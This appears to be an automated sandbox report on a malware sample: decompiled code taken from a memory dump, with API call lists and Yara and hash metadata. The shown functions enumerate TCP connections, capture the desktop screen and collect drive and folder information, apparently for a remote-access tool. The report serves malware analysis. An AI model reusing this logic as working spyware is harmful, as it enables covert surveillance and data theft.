                                                                                    				_push(__esi);
                                                                                    				_t204 = 0;
                                                                                    				_t195 = LoadLibraryA("iphlpapi.dll");
                                                                                    				if(_t195 == 0) {
                                                                                    					L5:
                                                                                    					return E04ED572E(_v16 ^ _t215);
                                                                                    				} else {
                                                                                    					_v604 = 0;
                                                                                    					_v600 = 1;
                                                                                    					_t102 = GetProcAddress(_t195, "GetExtendedTcpTable");
                                                                                    					_v548 = _t102;
                                                                                    					if(_t102 == 0) {
                                                                                    						_t197 = GetProcAddress(_t195, "AllocateAndGetTcpExTableFromStack");
                                                                                    						__eflags = _t197;
                                                                                    						if(_t197 == 0) {
                                                                                    							__eflags = 0;
                                                                                    							goto L24;
                                                                                    						} else {
                                                                                    							_v544 = 0;
                                                                                    							_t108 =  *_t197( &_v544, 1, GetProcessHeap(), 0, 2);
                                                                                    							__eflags = _t108;
                                                                                    							if(_t108 == 0) {
                                                                                    								_t109 = LocalAlloc(0x40, 0x2800);
                                                                                    								_t178 = _v544;
                                                                                    								_t199 = _t109;
                                                                                    								_v548 = 0;
                                                                                    								__eflags =  *_t178;
                                                                                    								if( *_t178 > 0) {
                                                                                    									_t188 = 0;
                                                                                    									_v552 = 0;
                                                                                    									asm("o16 nop [eax+eax]");
                                                                                    									do {
                                                                                    										_v596 =  *((intOrPtr*)(_t188 +  &(_t178[2])));
                                                                                    										_v592 =  *((intOrPtr*)(_t188 +  &(_t178[3])));
                                                                                    										_v588 =  *((intOrPtr*)(_t188 +  &(_t178[4])));
                                                                                    										_v584 =  *((intOrPtr*)(_t188 +  &(_t178[5])));
                                                                                    										_t179 =  *((intOrPtr*)(_t188 +  &(_t178[6])));
                                                                                    										_push(_t179);
                                                                                    										_v580 =  *((intOrPtr*)(_t188 +  &(_t178[1])));
                                                                                    										_v576 = _t179;
                                                                                    										E04EBD4B0(_t179,  &_v540);
                                                                                    										_t228 = _t223 + 4;
                                                                                    										_v556 = 0x22 + lstrlenW( &_v540) * 2 + _t204;
                                                                                    										_t125 = LocalSize(_t199);
                                                                                    										_t180 = _v556;
                                                                                    										__eflags = _t125 - _t180;
                                                                                    										if(_t125 < _t180) {
                                                                                    											_t199 = LocalReAlloc(_t199, _t180, 0x42);
                                                                                    										}
                                                                                    										asm("movups xmm0, [ebp-0x250]");
                                                                                    										asm("movups [esi+edi], xmm0");
                                                                                    										asm("movups xmm0, [ebp-0x240]");
                                                                                    										asm("movups [esi+edi+0x10], xmm0");
                                                                                    										_t208 = _t204 + 0x20;
                                                                                    										E04EDDC90(_t208 + _t199,  &_v540, 2 + lstrlenW( &_v540) * 2);
                                                                                    										_t223 = _t228 + 0xc;
                                                                                    										_t133 = lstrlenW( &_v540);
                                                                                    										_t178 = _v544;
                                                                                    										_t188 = _v552 + 0x18;
                                                                                    										_v552 = _t188;
                                                                                    										_t204 = _t208 + _t133 * 2 + 2;
                                                                                    										_t135 = _v548 + 1;
                                                                                    										_v548 = _t135;
                                                                                    										__eflags = _t135 -  *_t178;
                                                                                    									} while (_t135 <  *_t178);
                                                                                    								}
                                                                                    								LocalReAlloc(_t199, _t204, 0x42);
                                                                                    								_t111 = _v544;
                                                                                    								__eflags = _t111;
                                                                                    								if(_t111 != 0) {
                                                                                    									HeapFree(GetProcessHeap(), 0, _t111);
                                                                                    								}
                                                                                    								goto L24;
                                                                                    							} else {
                                                                                    								_t137 = _v544;
                                                                                    								__eflags = _t137;
                                                                                    								if(_t137 == 0) {
                                                                                    									goto L5;
                                                                                    								} else {
                                                                                    									HeapFree(GetProcessHeap(), 0, _t137);
                                                                                    									__eflags = _v16 ^ _t215;
                                                                                    									return E04ED572E(_v16 ^ _t215);
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					} else {
                                                                                    						_v544 = 0;
                                                                                    						_t143 =  *_t102(0,  &_v544, 1, 2, 5, 0);
                                                                                    						_t237 = _t143 - 0x7a;
                                                                                    						if(_t143 != 0x7a) {
                                                                                    							goto L5;
                                                                                    						} else {
                                                                                    							_push(_v544);
                                                                                    							_t144 = E04ED5785( &_v544, 0, _t237);
                                                                                    							_t231 = _t223 + 4;
                                                                                    							_t201 = _t144;
                                                                                    							_v560 = _t201;
                                                                                    							_push(0);
                                                                                    							_push(5);
                                                                                    							_push(2);
                                                                                    							_push(1);
                                                                                    							_push( &_v544);
                                                                                    							_push(_t201);
                                                                                    							if(_v548() == 0) {
                                                                                    								_t202 = LocalAlloc(0x40, 0x2800);
                                                                                    								_v552 = 0;
                                                                                    								_t148 = _v560;
                                                                                    								__eflags =  *_t148;
                                                                                    								if( *_t148 > 0) {
                                                                                    									_t184 =  &(_t148[3]);
                                                                                    									_v548 = _t184;
                                                                                    									asm("o16 nop [eax+eax]");
                                                                                    									do {
                                                                                    										_v596 =  *((intOrPtr*)(_t184 - 4));
                                                                                    										_v592 =  *_t184;
                                                                                    										_v588 =  *((intOrPtr*)(_t184 + 4));
                                                                                    										_v584 =  *((intOrPtr*)(_t184 + 8));
                                                                                    										_t185 =  *((intOrPtr*)(_t184 + 0xc));
                                                                                    										_push(_t185);
                                                                                    										_v580 =  *((intOrPtr*)(_t184 - 8));
                                                                                    										_v576 = _t185;
                                                                                    										E04EBD4B0(_t185,  &_v540);
                                                                                    										_t233 = _t231 + 4;
                                                                                    										_v556 = 0x22 + lstrlenW( &_v540) * 2 + _t204;
                                                                                    										_t161 = LocalSize(_t202);
                                                                                    										_t186 = _v556;
                                                                                    										__eflags = _t161 - _t186;
                                                                                    										if(_t161 < _t186) {
                                                                                    											_t202 = LocalReAlloc(_t202, _t186, 0x42);
                                                                                    										}
                                                                                    										asm("movups xmm0, [ebp-0x250]");
                                                                                    										asm("movups [esi+edi], xmm0");
                                                                                    										asm("movups xmm0, [ebp-0x240]");
                                                                                    										asm("movups [esi+edi+0x10], xmm0");
                                                                                    										_t211 = _t204 + 0x20;
                                                                                    										E04EDDC90(_t211 + _t202,  &_v540, 2 + lstrlenW( &_v540) * 2);
                                                                                    										_t231 = _t233 + 0xc;
                                                                                    										_t169 = lstrlenW( &_v540);
                                                                                    										_t193 = _v552 + 1;
                                                                                    										_t184 = _v548 + 0x18;
                                                                                    										_v552 = _t193;
                                                                                    										_v548 = _t184;
                                                                                    										_t204 = _t211 + _t169 * 2 + 2;
                                                                                    										__eflags = _t193 -  *_v560;
                                                                                    									} while (_t193 <  *_v560);
                                                                                    								}
                                                                                    								_v556 = LocalReAlloc(_t202, _t204, 0x42);
                                                                                    								E04ED573F(_v560);
                                                                                    								L24:
                                                                                    								__eflags = _v16 ^ _t215;
                                                                                    								return E04ED572E(_v16 ^ _t215);
                                                                                    							} else {
                                                                                    								E04ED573F(_t201);
                                                                                    								goto L5;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}

Instruction addresses for the decompiled listing above:
                                                                                    0x04ebd559
                                                                                    0x04ebd560
                                                                                    0x04ebd564
                                                                                    0x04ebd566
                                                                                    0x04ebd56c
                                                                                    0x04ebd573
                                                                                    0x04ebd576
                                                                                    0x04ebd57d
                                                                                    0x04ebd585
                                                                                    0x04ebd589
                                                                                    0x04ebd609
                                                                                    0x04ebd61d
                                                                                    0x04ebd58b
                                                                                    0x04ebd591
                                                                                    0x04ebd597
                                                                                    0x04ebd5a1
                                                                                    0x04ebd5a7
                                                                                    0x04ebd5af
                                                                                    0x04ebd781
                                                                                    0x04ebd783
                                                                                    0x04ebd785
                                                                                    0x04ebd93c
                                                                                    0x00000000
                                                                                    0x04ebd78b
                                                                                    0x04ebd78f
                                                                                    0x04ebd7a5
                                                                                    0x04ebd7a7
                                                                                    0x04ebd7a9
                                                                                    0x04ebd7e6
                                                                                    0x04ebd7ec
                                                                                    0x04ebd7f2
                                                                                    0x04ebd7f4
                                                                                    0x04ebd7fa
                                                                                    0x04ebd7fc
                                                                                    0x04ebd802
                                                                                    0x04ebd804
                                                                                    0x04ebd80a
                                                                                    0x04ebd810
                                                                                    0x04ebd814
                                                                                    0x04ebd81e
                                                                                    0x04ebd828
                                                                                    0x04ebd832
                                                                                    0x04ebd83c
                                                                                    0x04ebd846
                                                                                    0x04ebd847
                                                                                    0x04ebd84d
                                                                                    0x04ebd853
                                                                                    0x04ebd858
                                                                                    0x04ebd872
                                                                                    0x04ebd878
                                                                                    0x04ebd87e
                                                                                    0x04ebd884
                                                                                    0x04ebd886
                                                                                    0x04ebd892
                                                                                    0x04ebd892
                                                                                    0x04ebd894
                                                                                    0x04ebd8a2
                                                                                    0x04ebd8a6
                                                                                    0x04ebd8ad
                                                                                    0x04ebd8b2
                                                                                    0x04ebd8ce
                                                                                    0x04ebd8d3
                                                                                    0x04ebd8dd
                                                                                    0x04ebd8e3
                                                                                    0x04ebd8ef
                                                                                    0x04ebd8f5
                                                                                    0x04ebd901
                                                                                    0x04ebd904
                                                                                    0x04ebd905
                                                                                    0x04ebd90b
                                                                                    0x04ebd90b
                                                                                    0x04ebd810
                                                                                    0x04ebd917
                                                                                    0x04ebd91f
                                                                                    0x04ebd925
                                                                                    0x04ebd927
                                                                                    0x04ebd934
                                                                                    0x04ebd934
                                                                                    0x00000000
                                                                                    0x04ebd7ab
                                                                                    0x04ebd7ab
                                                                                    0x04ebd7b1
                                                                                    0x04ebd7b3
                                                                                    0x00000000
                                                                                    0x04ebd7b9
                                                                                    0x04ebd7c4
                                                                                    0x04ebd7d1
                                                                                    0x04ebd7de
                                                                                    0x04ebd7de
                                                                                    0x04ebd7b3
                                                                                    0x04ebd7a9
                                                                                    0x04ebd5b5
                                                                                    0x04ebd5c2
                                                                                    0x04ebd5ca
                                                                                    0x04ebd5cc
                                                                                    0x04ebd5cf
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 04EBD57F
                                                                                    • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 04EBD5A1
                                                                                    • LocalAlloc.KERNEL32(00000040,00002800), ref: 04EBD625
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBD69B
                                                                                    • LocalSize.KERNEL32 ref: 04EBD6B1
                                                                                    • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 04EBD6C5
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBD6EE
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBD716
                                                                                    • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 04EBD750
                                                                                    • GetProcAddress.KERNEL32(00000000,AllocateAndGetTcpExTableFromStack), ref: 04EBD77B
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000002), ref: 04EBD795
                                                                                    • HeapFree.KERNEL32(00000000), ref: 04EBD7C4
                                                                                    • LocalAlloc.KERNEL32(00000040,00002800), ref: 04EBD7E6
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBD862
                                                                                    • LocalSize.KERNEL32 ref: 04EBD878
                                                                                    • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 04EBD88C
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBD8B5
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBD8DD
                                                                                    • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 04EBD917
                                                                                    • HeapFree.KERNEL32(00000000), ref: 04EBD934
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$Alloclstrlen$Heap$AddressFreeProcSize$LibraryLoadProcess
                                                                                    • String ID: AllocateAndGetTcpExTableFromStack$GetExtendedTcpTable$iphlpapi.dll
                                                                                    • API String ID: 1916288693-4277049092
                                                                                    • Opcode ID: 21d48f29c57f69d6b81b9ba0502832be0e17ec2c73c6fc91a5dcd2d6f9661c9b
                                                                                    • Instruction ID: 74456b33af37cae6c6b769c9cfdcba17702705af336a047731601bdf186cc5c2
                                                                                    • Opcode Fuzzy Hash: 21d48f29c57f69d6b81b9ba0502832be0e17ec2c73c6fc91a5dcd2d6f9661c9b
                                                                                    • Instruction Fuzzy Hash: ABC18075D402199BDB20DF68DC88BEAB7B4EF98305F144599E80DE3241EB74AE81CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 76%
                                                                                    			E04EC23B0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, char _a8) {
                                                                                    				signed int _v12;
                                                                                    				short _v144;
                                                                                    				struct tagMONITORINFO _v184;
                                                                                    				struct _devicemodeW _v408;
                                                                                    				signed int _t93;
                                                                                    				struct HICON__* _t96;
                                                                                    				void* _t97;
                                                                                    				void* _t98;
                                                                                    				struct HWND__* _t99;
                                                                                    				struct HMONITOR__* _t102;
                                                                                    				struct HDC__* _t114;
                                                                                    				intOrPtr* _t139;
                                                                                    				intOrPtr _t142;
                                                                                    				signed int _t153;
                                                                                    				void** _t154;
                                                                                    				struct HICON__** _t157;
                                                                                    				void** _t160;
                                                                                    				signed int _t164;
                                                                                    
                                                                                    				_t93 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v12 = _t93 ^ _t164;
                                                                                    				asm("movaps xmm0, [0x4efe8b0]");
                                                                                    				asm("movups [ebp-0x4c], xmm0");
                                                                                    				_push(__ebx);
                                                                                    				asm("movaps xmm0, [0x4efe8a0]");
                                                                                    				_t139 = __ecx;
                                                                                    				asm("movups [ebp-0x3c], xmm0");
                                                                                    				_push(__esi);
                                                                                    				asm("movaps xmm0, [0x4efe890]");
                                                                                    				asm("movups [ebp-0x2c], xmm0");
                                                                                    				_t2 = _t139 + 0xc4; // 0xc4
                                                                                    				_t157 = _t2;
                                                                                    				 *__ecx = 0x4efdcb4;
                                                                                    				asm("movaps xmm0, [0x4efe880]");
                                                                                    				_push(__edi);
                                                                                    				 *((intOrPtr*)(__ecx + 0x80)) = 0x4efdc9c;
                                                                                    				_t153 = 0;
                                                                                    				asm("movups [ebp-0x1c], xmm0");
                                                                                    				do {
                                                                                    					 *(_t157 - 0x40) =  *(_t164 + _t153 * 4 - 0x4c);
                                                                                    					_t96 = LoadCursorW(0,  *(_t164 + _t153 * 4 - 0x4c));
                                                                                    					_t153 = _t153 + 1;
                                                                                    					 *_t157 = _t96;
                                                                                    					_t157 =  &(_t157[1]);
                                                                                    				} while (_t153 < 0x10);
                                                                                    				_t142 = _a4;
                                                                                    				_t97 = _t142 - 1;
                                                                                    				if(_t97 > 0x1f) {
                                                                                    					L5:
                                                                                    					 *(_t139 + 0x68) = 0x20;
                                                                                    				} else {
                                                                                    					switch( *((intOrPtr*)(( *(_t97 + 0x4ec2624) & 0x000000ff) * 4 +  &M04EC261C))) {
                                                                                    						case 0:
                                                                                    							goto L4;
                                                                                    						case 1:
                                                                                    							goto L5;
                                                                                    					}
                                                                                    				}
                                                                                    				_t98 = E04EC5530(_t139, _t153, _t157);
                                                                                    				_t170 = _t98;
                                                                                    				if(_t98 != 0) {
                                                                                    					ReleaseDC( *(_t139 + 0x104),  *(_t139 + 0x3c));
                                                                                    				}
                                                                                    				_t99 = GetDesktopWindow();
                                                                                    				 *(_t139 + 0x104) = _t99;
                                                                                    				 *(_t139 + 0x3c) = GetDC(_t99);
                                                                                    				 *((intOrPtr*)(_t139 + 0x10)) = 0xcc0020;
                                                                                    				 *((char*)(_t139 + 4)) = 2;
                                                                                    				 *((intOrPtr*)(_t139 + 8)) = 0x64;
                                                                                    				 *((char*)(_t139 + 0xc)) = _a8;
                                                                                    				_t102 = GetDesktopWindow();
                                                                                    				__imp__MonitorFromWindow(_t102, 2);
                                                                                    				_v184.cbSize = 0x68;
                                                                                    				GetMonitorInfoW(_t102,  &_v184);
                                                                                    				_v408.dmSize = 0xdc;
                                                                                    				EnumDisplaySettingsW( &_v144, 0xffffffff,  &_v408);
                                                                                    				 *(_t139 + 0x20) = _v408.dmPelsWidth;
                                                                                    				 *(_t139 + 0x24) = _v408.dmPelsHeight;
                                                                                    				asm("cdq");
                                                                                    				 *((char*)(_t139 + 0x1c)) = 0x20 /  *(_t139 + 0x68);
                                                                                    				 *(_t139 + 0x28) = 0;
                                                                                    				 *(_t139 + 0x44) = CreateCompatibleDC( *(_t139 + 0x3c));
                                                                                    				 *(_t139 + 0x78) = CreateCompatibleDC( *(_t139 + 0x3c));
                                                                                    				 *(_t139 + 0x40) = CreateCompatibleDC(0);
                                                                                    				_t114 = CreateCompatibleDC(0);
                                                                                    				_t48 = _t139 + 0x54; // 0x54
                                                                                    				_t160 = _t48;
                                                                                    				 *(_t139 + 0x48) = _t114;
                                                                                    				_t51 = _t139 + 0x58; // 0x58
                                                                                    				_t154 = _t51;
                                                                                    				 *_t160 = 0;
                                                                                    				 *_t154 = 0;
                                                                                    				 *(_t139 + 0x5c) = E04EC2880(_t139,  *(_t139 + 0x68),  *(_t139 + 0x20), 1);
                                                                                    				 *(_t139 + 0x60) = E04EC2880(_t139,  *(_t139 + 0x68),  *(_t139 + 0x20),  *(_t139 + 0x24));
                                                                                    				 *((intOrPtr*)(_t139 + 0x64)) = E04EC2880(_t139,  *(_t139 + 0x68),  *(_t139 + 0x20), 1);
                                                                                    				 *(_t139 + 0x4c) = CreateDIBSection( *(_t139 + 0x3c),  *(_t139 + 0x5c), 0, _t160, 0, 0);
                                                                                    				 *(_t139 + 0x50) = CreateDIBSection( *(_t139 + 0x3c),  *(_t139 + 0x60), 0, _t154, 0, 0);
                                                                                    				_t66 = _t139 + 0x70; // 0x70
                                                                                    				 *(_t139 + 0x7c) = CreateDIBSection( *(_t139 + 0x3c),  *(_t139 + 0x60), 0, _t66, 0, 0);
                                                                                    				SelectObject( *(_t139 + 0x44),  *(_t139 + 0x50));
                                                                                    				SelectObject( *(_t139 + 0x40),  *(_t139 + 0x4c));
                                                                                    				SelectObject( *(_t139 + 0x78),  *(_t139 + 0x7c));
                                                                                    				SetRect(_t139 + 0x2c, 0, 0,  *(_t139 + 0x20),  *(_t139 + 0x24));
                                                                                    				 *((intOrPtr*)(_t139 + 0x14)) = E04ED5785(_t139, SelectObject, _t170);
                                                                                    				 *(_t139 + 0x6c) =  *(_t139 + 0x60)->bmiHeader.biSizeImage /  *(_t139 + 0x24);
                                                                                    				 *(_t139 + 0x18) = 0;
                                                                                    				return E04ED572E(_v12 ^ _t164,  *(_t139 + 0x60)->bmiHeader.biSizeImage +  *(_t139 + 0x60)->bmiHeader.biSizeImage);
                                                                                    			}


                                                                                    APIs
                                                                                    • LoadCursorW.USER32(00000000,?), ref: 04EC241A
                                                                                      • Part of subcall function 04EC5530: GetCurrentThreadId.KERNEL32 ref: 04EC5548
                                                                                      • Part of subcall function 04EC5530: GetThreadDesktop.USER32(00000000), ref: 04EC554F
                                                                                      • Part of subcall function 04EC5530: GetUserObjectInformationA.USER32 ref: 04EC558F
                                                                                      • Part of subcall function 04EC5530: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 04EC559A
                                                                                      • Part of subcall function 04EC5530: GetUserObjectInformationA.USER32 ref: 04EC55CE
                                                                                      • Part of subcall function 04EC5530: lstrcmpiA.KERNEL32(?,?), ref: 04EC55DE
                                                                                      • Part of subcall function 04EC5530: SetThreadDesktop.USER32(00000000), ref: 04EC55E9
                                                                                      • Part of subcall function 04EC5530: CloseDesktop.USER32(?), ref: 04EC55FD
                                                                                      • Part of subcall function 04EC5530: CloseDesktop.USER32(00000000), ref: 04EC5600
                                                                                    • ReleaseDC.USER32 ref: 04EC2462
                                                                                    • GetDesktopWindow.USER32 ref: 04EC246E
                                                                                    • GetDC.USER32(00000000), ref: 04EC2477
                                                                                    • GetDesktopWindow.USER32 ref: 04EC2498
                                                                                    • MonitorFromWindow.USER32(00000000,00000002), ref: 04EC249D
                                                                                    • GetMonitorInfoW.USER32 ref: 04EC24B5
                                                                                    • EnumDisplaySettingsW.USER32 ref: 04EC24D5
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 04EC2509
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 04EC2511
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 04EC2518
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 04EC251F
                                                                                    • CreateDIBSection.GDI32(?,?,00000000,00000054,00000000,00000000), ref: 04EC2580
                                                                                    • CreateDIBSection.GDI32(?,?,00000000,00000058,00000000,00000000), ref: 04EC2592
                                                                                    • CreateDIBSection.GDI32(?,?,00000000,00000070,00000000,00000000), ref: 04EC25A7
                                                                                    • SelectObject.GDI32(?,?), ref: 04EC25B8
                                                                                    • SelectObject.GDI32(?,?), ref: 04EC25C0
                                                                                    • SelectObject.GDI32(?,?), ref: 04EC25C8
                                                                                    • SetRect.USER32 ref: 04EC25D8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateDesktop$Object$Compatible$SectionSelectThreadWindow$CloseInformationMonitorUser$CurrentCursorDisplayEnumFromInfoInputLoadOpenRectReleaseSettingslstrcmpi
                                                                                    • String ID: $ $d$h
                                                                                    • API String ID: 1416193606-3710049695
                                                                                    • Opcode ID: 21f141cc987132b1d398108ae92f5e436a77f95d6f4951dbca0add57afce2f20
                                                                                    • Instruction ID: aafc53be051eeb28139ffa4a51b3bb977eca62e093b41cf5c0b862bfc0e0837f
                                                                                    • Opcode Fuzzy Hash: 21f141cc987132b1d398108ae92f5e436a77f95d6f4951dbca0add57afce2f20
                                                                                    • Instruction Fuzzy Hash: 368136B1900204EBEF159F69CC84B997FB5FF08304F1441AAEE049B26AD775E955CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 73%
                                                                                    			E04EB48F0(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				short _v1052;
                                                                                    				short _v2092;
                                                                                    				struct _SHFILEINFOW _v2788;
                                                                                    				intOrPtr _v2792;
                                                                                    				signed int _v2796;
                                                                                    				union _ULARGE_INTEGER* _v2800;
                                                                                    				intOrPtr _v2804;
                                                                                    				signed int _v2808;
                                                                                    				signed int _v2816;
                                                                                    				union _ULARGE_INTEGER _v2820;
                                                                                    				signed int _v2824;
                                                                                    				union _ULARGE_INTEGER _v2828;
                                                                                    				signed int _t83;
                                                                                    				signed int _t98;
                                                                                    				int _t114;
                                                                                    				int _t121;
                                                                                    				signed int _t136;
                                                                                    				void* _t156;
                                                                                    				signed int _t157;
                                                                                    				WCHAR* _t167;
                                                                                    				intOrPtr* _t168;
                                                                                    				void* _t170;
                                                                                    				void* _t175;
                                                                                    				void* _t176;
                                                                                    				void* _t178;
                                                                                    				intOrPtr _t180;
                                                                                    				intOrPtr _t183;
                                                                                    				void* _t184;
                                                                                    				void* _t185;
                                                                                    				signed int _t186;
                                                                                    				void* _t187;
                                                                                    				void* _t191;
                                                                                    
                                                                                    				_t157 = __ecx;
                                                                                    				_t83 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t83 ^ _t186;
                                                                                    				_v2808 = __ecx;
                                                                                    				_t156 = LocalAlloc(0x40, 0x800);
                                                                                    				 *_t156 = 0x68;
                                                                                    				GetLogicalDriveStringsW(0x208,  &_v2092);
                                                                                    				_t167 =  &_v2092;
                                                                                    				asm("xorps xmm0, xmm0");
                                                                                    				_t175 = 1;
                                                                                    				asm("movlpd [ebp-0xb00], xmm0");
                                                                                    				asm("movlpd [ebp-0xb08], xmm0");
                                                                                    				if(_v2092 != 0) {
                                                                                    					do {
                                                                                    						E04EDDAD0(_t167,  &_v1052, 0, 0x410);
                                                                                    						_t191 = _t187 + 0xc;
                                                                                    						GetVolumeInformationW(_t167, 0, 0, 0, 0, 0,  &_v1052, 0x208);
                                                                                    						SHGetFileInfoW(_t167, 0x80,  &_v2788, 0x2b4, 0x410);
                                                                                    						_v2804 = 2 + lstrlenW( &(_v2788.szTypeName)) * 2;
                                                                                    						_v2792 = 2 + lstrlenW( &_v1052) * 2;
                                                                                    						_t136 =  *_t167 & 0x0000ffff;
                                                                                    						if(_t136 == 0x41 || _t136 == 0x42 || GetDiskFreeSpaceExW(_t167,  &_v2828,  &_v2820, 0) == 0) {
                                                                                    							_v2796 = 0;
                                                                                    							_v2800 = 0;
                                                                                    						} else {
                                                                                    							_v2796 = (_v2816 << 0x00000020 | _v2820.LowPart) >> 0x14;
                                                                                    							_t157 = (_v2824 << 0x00000020 | _v2828.LowPart) >> 0x14;
                                                                                    							_v2800 = _t157;
                                                                                    						}
                                                                                    						 *((short*)(_t175 + _t156)) =  *_t167;
                                                                                    						 *((char*)(_t175 + _t156 + 2)) = GetDriveTypeW(_t167);
                                                                                    						 *(_t175 + _t156 + 6) = _v2796;
                                                                                    						 *(_t175 + _t156 + 0xa) = _v2800;
                                                                                    						_t184 = _t175 + 0xe;
                                                                                    						E04EDDC90(_t184 + _t156,  &(_v2788.szTypeName), _v2804);
                                                                                    						_t185 = _t184 + _v2804;
                                                                                    						E04EDDC90(_t185 + _t156,  &_v1052, _v2792);
                                                                                    						_t175 = _t185 + _v2792;
                                                                                    						_t187 = _t191 + 0x18;
                                                                                    						_t167 =  &(( &(_t167[lstrlenW(_t167)]))[1]);
                                                                                    					} while ( *_t167 != 0);
                                                                                    				}
                                                                                    				_t168 = __imp__SHGetSpecialFolderPathW;
                                                                                    				_t176 = _t175 + 2;
                                                                                    				 *((short*)(_t176 + _t156 - 2)) = 0;
                                                                                    				 *_t168(0,  &_v1052, 0x10, 0);
                                                                                    				E04EDDC90(_t176 + _t156,  &_v1052, 2 + lstrlenW( &_v1052) * 2);
                                                                                    				_t98 = lstrlenW( &_v1052);
                                                                                    				_t178 = _t176 + _t98 * 2 + 2;
                                                                                    				 *_t168(0,  &_v1052, 5, 0);
                                                                                    				E04EDDC90(_t178 + _t156,  &_v1052, 2 + lstrlenW( &_v1052) * 2);
                                                                                    				_t180 = _t178 + lstrlenW( &_v1052) * 2 + 2;
                                                                                    				_v2792 = _t180;
                                                                                    				_t170 = E04EB47A0();
                                                                                    				if(_t170 != 0) {
                                                                                    					_t114 = LocalSize(_t170);
                                                                                    					if(_t180 + _t114 <= LocalSize(_t156)) {
                                                                                    						_t183 = _v2792;
                                                                                    					} else {
                                                                                    						_t121 = LocalSize(_t170);
                                                                                    						_t183 = _v2792;
                                                                                    						_t156 = LocalReAlloc(_t156, _t121 + _t183, 0x42);
                                                                                    					}
                                                                                    					E04EDDC90(_t183 + _t156, _t170, LocalSize(_t170));
                                                                                    					_t180 = _t183 + LocalSize(_t170);
                                                                                    					LocalFree(_t170);
                                                                                    				}
                                                                                    				_push(_t157);
                                                                                    				_push(0x3f);
                                                                                    				_push(_t180);
                                                                                    				E04EB1C60( *((intOrPtr*)(_v2808 + 4)));
                                                                                    				LocalFree(_t156);
                                                                                    				return E04ED572E(_v8 ^ _t186, _t156);
                                                                                    			}

                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,00000800), ref: 04EB4913
                                                                                    • GetLogicalDriveStringsW.KERNEL32(00000208,?), ref: 04EB492A
                                                                                    • GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000208), ref: 04EB498D
                                                                                    • SHGetFileInfoW.SHELL32(00000000,00000080,?,000002B4,00000410), ref: 04EB49AA
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB49B7
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB49D1
                                                                                    • GetDiskFreeSpaceExW.KERNEL32(00000000,?,?,00000000), ref: 04EB4A02
                                                                                    • GetDriveTypeW.KERNEL32(00000000), ref: 04EB4A5C
                                                                                    • lstrlenW.KERNEL32(00000000), ref: 04EB4AB9
                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 04EB4AEB
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB4AF4
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB4B1C
                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000005,00000000), ref: 04EB4B35
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB4B44
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB4B68
                                                                                    • LocalSize.KERNEL32 ref: 04EB4B82
                                                                                    • LocalSize.KERNEL32 ref: 04EB4B8B
                                                                                    • LocalSize.KERNEL32 ref: 04EB4B98
                                                                                    • LocalReAlloc.KERNEL32(00000000,00000000), ref: 04EB4BA8
                                                                                    • LocalSize.KERNEL32 ref: 04EB4BB9
                                                                                    • LocalSize.KERNEL32 ref: 04EB4BCE
                                                                                    • LocalFree.KERNEL32(00000000), ref: 04EB4BDD
                                                                                    • LocalFree.KERNEL32(00000000,00000000,?,0000003F), ref: 04EB4BFD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$lstrlen$Size$Free$AllocDriveFolderPathSpecial$DiskFileInfoInformationLogicalSpaceStringsTypeVolume
                                                                                    • String ID:
                                                                                    • API String ID: 4186219405-0
                                                                                    • Opcode ID: ccacce76ae5df70b84121ff1c085efb25941a4c81b543e2edb90c1b35b0bea03
                                                                                    • Instruction ID: 5480798a2541f28e0cce0d1b6a69f8f1cd831d3dfcb0c06e3829026ae0b84388
                                                                                    • Opcode Fuzzy Hash: ccacce76ae5df70b84121ff1c085efb25941a4c81b543e2edb90c1b35b0bea03
